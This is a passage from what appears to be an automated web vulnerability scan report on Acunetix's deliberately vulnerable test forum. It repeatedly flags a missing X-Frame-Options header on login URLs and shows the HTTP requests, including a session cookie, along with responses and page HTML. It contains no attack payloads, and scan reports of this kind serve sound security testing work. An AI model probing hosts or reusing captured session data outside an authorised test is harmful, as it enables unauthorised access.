<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> 